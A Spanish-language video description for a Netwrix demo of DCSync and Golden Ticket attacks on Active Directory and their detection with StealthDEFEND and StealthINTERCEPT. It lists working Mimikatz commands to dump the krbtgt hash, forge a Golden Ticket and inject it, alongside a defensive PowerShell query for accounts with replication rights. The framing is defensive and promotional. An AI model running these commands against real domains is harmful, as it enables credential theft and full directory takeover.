Ataques DCSync y GoldenTicket y detección con StealthDEFEND & StealthINTERCEPT

Los ataques DCSync y Golden Ticket en Microsoft Active Directory pueden permitir a un atacante tomar el control de tu directorio. En este vídeo demostraremos cómo se realizan estos ataques con Mimikatz para que sepas si tu organización es vulnerable a estos ataques. Además, puedes ver cómo detectar, mitigar y responder ante estos ataques tanto con herramientas básicas como con las herramientas avanzadas de Netwrix (StealthDEFEND y StealthINTERCEPT), que están diseñadas para proteger el Active Directory. 0:00 - 0. Introducción 3:10 - 1. Demostración 7:39 - 2. Preparación 9:58 - 3. Protección Básica 16:54 - 4. Protección Avanzada Referencias del vídeo: Vídeo de StealthAUDIT for Active Directory, solución de auditoría y prevención en Active Directory:    • [DEMO] StealthAUDIT for Active Directory   Vídeo de StealthAUDIT for File Systems, solución de auditoría y prevención en Servidores de Archivos:    • [Demo] StealthAUDIT for Files Systems   Comandos de PowerShell y Mimikatz utilizados: Cómo obtener el nombre del dominio: (Get-WmiObject -Class Win32_ComputerSystem).Domain Extraer el Hash NTLM de krbtgt: lsadump::dcsync /domain:NombreDelDominio /user:krbtgt Generar el Golden Ticket: kerberos::golden /domain:NombreDelDominio /sid:x-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /rc4:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /id:500 /user:NombreDelUsuarioFicticio Aplicar el Golden Ticket: kerberos::ptt ticket.kirbi Obtener la lista de usuarios con permisos de replicación: (Get-Acl "ad:\dc=DominioDe2oNivel,dc=TopLevelDomain").Access | ? {($_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" ) } | select IdentityReference